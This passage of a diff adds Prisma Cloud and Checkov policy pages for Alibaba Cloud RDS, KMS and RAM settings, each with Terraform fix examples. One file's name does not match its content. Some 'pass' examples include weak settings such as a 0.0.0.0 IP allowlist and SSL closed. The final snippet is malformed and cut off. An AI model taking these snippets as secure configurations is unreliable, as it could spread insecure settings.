diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc
new file mode 100644
index 000000000..43b37e25c
--- /dev/null
+++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-disconnections-enabled.adoc
@@ -0,0 +1,51 @@
+== Alibaba Cloud KMS Key is disabled
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9b1cdf52-7013-4642-9c48-4427b8247fa0
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py[CKV_ALI_28]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Enabling your KMS key helps protect your data from unauthorized access or tampering by encrypting the data and requiring users to provide the correct key in order to decrypt and access the data.
+By enabling your KMS key, you can help ensure that only authorized users with the correct credentials can access your data.
+ +=== Fix - Buildtime + + +*Terraform* + +Enable the KMS key by adding the following code to your Terraform file during buildtime. + + +[source,go] +---- +resource "alicloud_kms_key" "pass" { + description = "Hello KMS" + pending_window_in_days = "7" + status = "Enabled" + automatic_rotation = "Enabled" +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc new file mode 100644 index 000000000..2ecdd3352 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-has-log-duration-enabled.adoc @@ -0,0 +1,38 @@ +== Alibaba Cloud RDS instance does not have log_duration enabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 67278e79-50a7-43d0-96e9-2229fb1a72e4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py[CKV_ALI_35] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling the log_duration parameter in an Alibaba Cloud RDS (Relational Database Service) instance can provide several benefits, including: + +* *Performance tuning:* The log_duration parameter can help you identify and analyze slow queries that may be impacting the performance of your RDS instance. +By measuring the duration of each query, you can identify which queries are taking the longest time to execute and optimize them to improve overall performance. + +* *Capacity planning:* The log_duration parameter can also help you with capacity planning by providing insights into the resource usage of your RDS instance. +By monitoring the duration of queries, you can identify which queries are consuming the most resources and plan accordingly for future growth and scaling. 
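+ +=== Fix - Buildtime + + +*Terraform* + +A minimal sketch of a buildtime fix, assuming log_duration is set through the parameters block of an alicloud_db_instance resource; the resource name and instance values shown are illustrative. + + +[source,go] +---- +resource "alicloud_db_instance" "example" { + engine = "PostgreSQL" + engine_version = "13.0" + instance_type = "pg.n2.small.1" + instance_storage = "20" + + # Illustrative: log the duration of each completed statement + parameters { + name = "log_duration" + value = "ON" + } +} +----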
+ + +//=== Fix - Buildtime diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc new file mode 100644 index 000000000..2934c754c --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc @@ -0,0 +1,57 @@ +== Alibaba Cloud RDS instance is not set to perform auto upgrades for minor versions + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e44b0978-888c-4f5b-b1e8-15808b5a0e31 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py[CKV_ALI_30] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Auto upgrades for minor versions help ensure that your RDS instance is running the latest version, which can include security updates and patches. +By enabling auto upgrades, you can help protect your RDS instance and the data it contains from vulnerabilities and threats. 
+ +=== Fix - Buildtime + + +*Terraform* + +Set auto_upgrade_minor_version to Auto by adding the following code to your Terraform file during buildtime. + + +[source,go] +---- +resource "alicloud_db_instance" "pass" { + auto_upgrade_minor_version = "Auto" + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.s2.large" + instance_storage = "30" + instance_charge_type = "Postpaid" + instance_name = "myfirstdb" + vswitch_id = alicloud_vswitch.ditch.id + monitoring_period = "60" + ssl_action = "Close" +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc new file mode 100644 index 000000000..41a557dfd --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc @@ -0,0 +1,152 @@ +== Alibaba Cloud RDS log audit is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 235041fc-facf-4048-97f6-df074bd99e22 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py[CKV_ALI_38] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The Alibaba Cloud RDS log audit (log audit) helps to detect and prevent security breaches by monitoring database activity and logging all operations in order to detect anomalous configuration activity and trace back unapproved changes. Disabling the log audit feature can leave your database vulnerable to attacks and unauthorized access, increasing the risk of data breaches and other security incidents. To prevent this risk, enable the log audit. + +=== Fix - Buildtime + + +*Terraform* +Enable the Alibaba Cloud RDS log audit by adding the following code to your Terraform file during buildtime. 
+ + + +[source,go] +---- +resource "alicloud_log_audit" "pass" { + display_name = "tf-audit-test" + aliuid = "12345678" + variable_map = { + "actiontrail_enabled" = "true", + "actiontrail_ttl" = "180", + "actiontrail_ti_enabled" = "true", + "oss_access_enabled" = "true", + "oss_access_ttl" = "7", + "oss_sync_enabled" = "true", + "oss_sync_ttl" = "180", + "oss_access_ti_enabled" = "true", + "oss_metering_enabled" = "true", + "oss_metering_ttl" = "180", + "rds_enabled" = "true", + "rds_audit_collection_policy" = "", + "rds_ttl" = "180", + "rds_ti_enabled" = "true", + "rds_slow_enabled" = "true", + "rds_slow_collection_policy" = "", + "rds_slow_ttl" = "180", + "rds_perf_enabled" = "true", + "rds_perf_collection_policy" = "", + "rds_perf_ttl" = "180", + "vpc_flow_enabled" = "true", + "vpc_flow_ttl" = "7", + "vpc_flow_collection_policy" = "", + "vpc_sync_enabled" = "true", + "vpc_sync_ttl" = "180", + "polardb_enabled" = "true", + "polardb_audit_collection_policy" = "", + "polardb_ttl" = "180", + "polardb_ti_enabled" = "true", + "polardb_slow_enabled" = "true", + "polardb_slow_collection_policy" = "", + "polardb_slow_ttl" = "180", + "polardb_perf_enabled" = "true", + "polardb_perf_collection_policy" = "", + "polardb_perf_ttl" = "180", + "drds_audit_enabled" = "true", + "drds_audit_collection_policy" = "", + "drds_audit_ttl" = "7", + "drds_sync_enabled" = "true", + "drds_sync_ttl" = "180", + "drds_audit_ti_enabled" = "true", + "slb_access_enabled" = "true", + "slb_access_collection_policy" = "", + "slb_access_ttl" = "7", + "slb_sync_enabled" = "true", + "slb_sync_ttl" = "180", + "slb_access_ti_enabled" = "true", + "bastion_enabled" = "true", + "bastion_ttl" = "180", + "bastion_ti_enabled" = "true", + "waf_enabled" = "true", + "waf_ttl" = "180", + "waf_ti_enabled" = "true", + "cloudfirewall_enabled" = "true", + "cloudfirewall_ttl" = "180", + "cloudfirewall_ti_enabled" = "true", + "ddos_coo_access_enabled" = "true", + "ddos_coo_access_ttl" = "180", + "ddos_coo_access_ti_enabled" = "true", + "ddos_bgp_access_enabled" = "true", + "ddos_bgp_access_ttl" = "180", + "ddos_dip_access_enabled" = "true", + "ddos_dip_access_ttl" = "180", + "ddos_dip_access_ti_enabled" = "true", + "sas_crack_enabled" = "true", + "sas_dns_enabled" = "true", + "sas_http_enabled" = "true", + "sas_local_dns_enabled" = "true", + "sas_login_enabled" = "true", + "sas_network_enabled" = "true", + "sas_process_enabled" = "true", + "sas_security_alert_enabled" = "true", + "sas_security_hc_enabled" = "true", + "sas_security_vul_enabled" = "true", + "sas_session_enabled" = "true", + "sas_snapshot_account_enabled" = "true", + "sas_snapshot_port_enabled" = "true", + "sas_snapshot_process_enabled" = "true", + "sas_ttl" = "180", + "sas_ti_enabled" = "true", + "apigateway_enabled" = "true", + "apigateway_ttl" = "180", + "apigateway_ti_enabled" = "true", + "nas_enabled" = "true", + "nas_ttl" = "180", + "nas_ti_enabled" = "true", + "appconnect_enabled" = "true", + "appconnect_ttl" = "180", + "cps_enabled" = "true", + "cps_ttl" = "180", + "cps_ti_enabled" = "true", + "k8s_audit_enabled" = "true", + "k8s_audit_collection_policy" = "", + "k8s_audit_ttl" = "180", + "k8s_event_enabled" = "true", + "k8s_event_collection_policy" = "", + "k8s_event_ttl" = "180", + "k8s_ingress_enabled" = "true", + "k8s_ingress_collection_policy" = "", + "k8s_ingress_ttl" = "180" + } +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-rds-instance-has-log-connections-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-rds-instance-has-log-connections-enabled.adoc new file mode 100644 index 000000000..fb0cc5de9 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-rds-instance-has-log-connections-enabled.adoc @@ -0,0 +1,64 @@ +== Alibaba RDS instance has log_connections disabled + + +=== Policy Details +[width=45%] 
+[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5629f0fd-2e48-4fff-93e8-893c8b674613 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py[CKV_ALI_37] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +RDS does not log attempted connections by default. +Enabling the log_connections setting creates log entries for each attempted connection to the server, along with the successful completion of client authentication. +This information can be useful in troubleshooting issues and determining any unusual connection attempts to the server. +We recommend you set the log_connections database flag for Alibaba Cloud RDS instances to on. + +=== Fix - Buildtime + + +*Terraform* + +Set the log_connections parameter to ON by adding the following code to your Terraform file during buildtime. + + +[source,go] +---- +resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.t1.small" + instance_storage = "10" + tde_status = "Disabled" + auto_upgrade_minor_version = "Manual" + # ssl_action="Closed" + security_ips = [ + "0.0.0.0", + "10.23.12.24/24" + ] + parameters { + name = "log_connections" + value = "ON" + } +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/alibaba-iam-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/alibaba-iam-policies.adoc new file mode 100644 index 000000000..d4bbf0ed8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/alibaba-iam-policies.adoc @@ -0,0 +1,54 @@ +== Alibaba IAM Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc[Alibaba Cloud RAM password policy maximal login attempts is more than 4] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py[CKV_ALI_23] 
+|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-enforces-mfa.adoc[Alibaba Cloud RAM does not enforce MFA] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py[CKV_ALI_24] +|LOW + + +|xref:ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc[Alibaba Cloud RAM password policy does not expire in 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py[CKV_ALI_16] +|LOW + + +|xref:ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc[Alibaba Cloud RAM password policy does not prevent password reuse] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py[CKV_ALI_18] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc[Alibaba Cloud RAM password policy does not have a lowercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py[CKV_ALI_17] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc[Alibaba Cloud RAM password policy does not have a number] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py[CKV_ALI_14] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc[Alibaba Cloud RAM password policy does not have a symbol] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py[CKV_ALI_15] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc[Alibaba Cloud RAM password policy does not have an uppercase character] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py[CKV_ALI_19] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc[Alibaba Cloud RAM password policy does not have a minimum of 14 characters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py[CKV_ALI_13] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc new file mode 100644 index 000000000..95acdb969 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc @@ -0,0 +1,58 @@ +== Alibaba Cloud RAM password policy maximal login attempts is more than 4 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7a639003-05d4-42c7-8ee1-d8c885fce81b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py[CKV_ALI_23] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By default, the maximum login attempts for an Alibaba Cloud RAM account (account) is set to 5. After 5 failed login attempts, the account is locked. By lowering the number of allowed login attempts, the risk of unauthorized access to the account is decreased, as the chances of guessing the correct login credentials are reduced. This policy identifies accounts which have maximum login attempts set to 5 or more. 
+ +=== Fix - Buildtime + + +*Terraform* + +To limit the maximum login attempts to fewer than 5, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 9 + require_lowercase_characters = false + require_uppercase_characters = false + require_numbers = false + require_symbols = false + hard_expiry = true + max_password_age = 12 + password_reuse_prevention = 5 + max_login_attempts = 3 +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-enforces-mfa.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-enforces-mfa.adoc new file mode 100644 index 000000000..4a7db1af6 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-enforces-mfa.adoc @@ -0,0 +1,50 @@ +== Alibaba Cloud RAM does not enforce MFA + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 540437da-f551-4273-8cff-8a8377bcff8e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py[CKV_ALI_24] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enforcing MFA helps protect your data from unauthorized access or tampering by requiring users to provide additional verification before accessing resources. +By enabling MFA, you can help ensure that only authorized users with the correct credentials can access your resources. 
+ +=== Fix - Buildtime + + +*Terraform* + +Enforce MFA for login by adding the following code to your Terraform file during buildtime. + + + +[source,go] +---- +resource "alicloud_ram_security_preference" "pass" { + enable_save_mfa_ticket = false + allow_user_to_change_password = true + enforce_mfa_for_login = true +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc new file mode 100644 index 000000000..0117c6199 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc @@ -0,0 +1,63 @@ +== Alibaba Cloud RAM password policy does not expire in 90 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 00a4e900-ca63-470f-9607-b7ad5cdd3ab3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py[CKV_ALI_16] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +As a best practice, change passwords every 90 days; this reduces the risk of unauthorized access to an account by shrinking the window of opportunity for attackers to use stolen or compromised passwords. This policy identifies Alibaba Cloud RAM accounts (account) that do not have password expiration set to 90 days or less. + + +//// +=== Fix - Runtime +Alibaba Cloud Portal +. Log in to Alibaba Cloud Portal +. Go to Resource Access Management (RAM) service +. In the left-side navigation pane, click on 'Settings' +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' +. 
In the 'Password Validity Period' field, enter 90 or less based on your requirement. +. Click on 'OK' +. Click on 'Close' +//// + + + + +=== Fix - Buildtime + + +*Terraform* + +To expire passwords within 90 days or less, set max_password_age by adding the following code to your Terraform file during buildtime; the value shown is illustrative. + +[source,go] +---- +resource "alicloud_ram_account_password_policy" "pass" { + # Illustrative: passwords expire after 90 days + max_password_age = 90 +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc new file mode 100644 index 000000000..82fa2d904 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc @@ -0,0 +1,58 @@ +== Alibaba Cloud RAM password policy does not prevent password reuse + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7faf958-448d-4046-aa2e-8ce36ca3a538 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py[CKV_ALI_18] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By default, the password policy for Alibaba Cloud RAM accounts (account) does not enforce restrictions on password reuse. If users reuse passwords, they become more vulnerable to password-related attacks, as reuse allows attackers to guess or recover an old password. To mitigate this risk and prevent unauthorized access to an account, enforce restrictions on password reuse to make it harder for attackers to guess or recover an old password. This policy identifies accounts that do not enforce restrictions on password reuse. 
+ + +=== Fix - Buildtime + + +*Terraform* + +To prevent password reuse, set password_reuse_prevention by adding the following code to your Terraform file during buildtime. + + +[source,go] +---- +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = false + require_numbers = false + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 24 + max_login_attempts = 3 +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc new file mode 100644 index 000000000..b75c8f277 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc @@ -0,0 +1,72 @@ +== Alibaba Cloud RAM password policy does not have a lowercase character + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a90974ff-16e0-4db9-be6e-73dc48eb5280 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py[CKV_ALI_17] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Including a lowercase character in a password is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. Using only uppercase or numeric characters in a password makes it easier for attackers to perform a brute-force attack, where they try all possible combinations until they find the correct one. 
By including lowercase characters, the number of possible combinations increases, making it more challenging for attackers to guess or crack the password. To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include a lowercase character for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include a lowercase character in their password policy. + +//// +=== Fix - Runtime +Alibaba Cloud Portal +. Log in to Alibaba Cloud Portal +. Go to Resource Access Management (RAM) service +. In the left-side navigation pane, click on 'Settings' +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' +. In the 'Required Elements in Password' field, select 'Lowercase Letters' +. Click on 'OK' +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* + +To require a lowercase character in passwords, add the following code to your Terraform file during buildtime. 
+ + + +[source,go] +---- +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = true + require_uppercase_characters = false + require_numbers = false + require_symbols = false + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc new file mode 100644 index 000000000..90e1f8d1e --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc @@ -0,0 +1,81 @@ +== Alibaba Cloud RAM password policy does not have a number + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c4a553b0-c4ef-4bdb-85e0-a0ca4901d773 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py[CKV_ALI_14] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Including a number in a password is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. Using only uppercase or lowercase characters in a password makes it easier for attackers to perform a brute-force attack, where they try all possible combinations until they find the correct one. By including numbers, the number of possible combinations increases, making it more challenging for attackers to guess or crack the password. 
To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include a number for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include a number in their password policy. + +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Resource Access Management (RAM) service + +. In the left-side navigation pane, click on 'Settings' + +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' + +. In the 'Required Elements in Password' field, select 'Numbers' + +. Click on 'OK' + +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* +To require a number in passwords, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = true + require_numbers = true + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc new file mode 100644 index 000000000..eaa38f45e --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc @@ -0,0 +1,83 @@ +== Alibaba Cloud RAM password policy does not have a symbol + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e53d9690-7b9b-4934-b6e7-c30599f60792 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py[CKV_ALI_15] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + + +Including a symbol in a password is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. Using only uppercase or lowercase characters, or a number in a password, makes it easier for attackers to perform a brute-force attack, where they try all possible combinations until they find the correct one. By including symbols, the number of possible combinations increases, making it more challenging for attackers to guess or crack the password. To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include a symbol for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include a symbol in their password policy. + +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Resource Access Management (RAM) service + +. In the left-side navigation pane, click on 'Settings' + +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' + +. In the 'Required Elements in Password' field, select 'Symbols' + +. Click on 'OK' + +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* +To require a symbol in passwords, add the following code to your Terraform file during buildtime. 
+ + + +[source,go] +---- +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = false + require_numbers = false + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc new file mode 100644 index 000000000..5f1544247 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc @@ -0,0 +1,85 @@ +== Alibaba Cloud RAM password policy does not have an uppercase character + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a3e8df44-208d-4962-be8a-43ff7f8841e0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py[CKV_ALI_19] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + + + +Including an uppercase character in a password is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. Using only lowercase or numeric characters in a password makes it easier for attackers to perform a brute-force attack, where they try all possible combinations until they find the correct one. By including uppercase characters, the number of possible combinations increases, making it more challenging for attackers to guess or crack the password. 
To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include an uppercase character for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include an uppercase character in their password policy. + +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Resource Access Management (RAM) service + +. In the left-side navigation pane, click on 'Settings' + +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' + +. In the 'Required Elements in Password' field, select 'Upper-Case Letter' + +. Click on 'OK' + +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* + +To identify accounts with passwords that do not include an uppercase character, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = 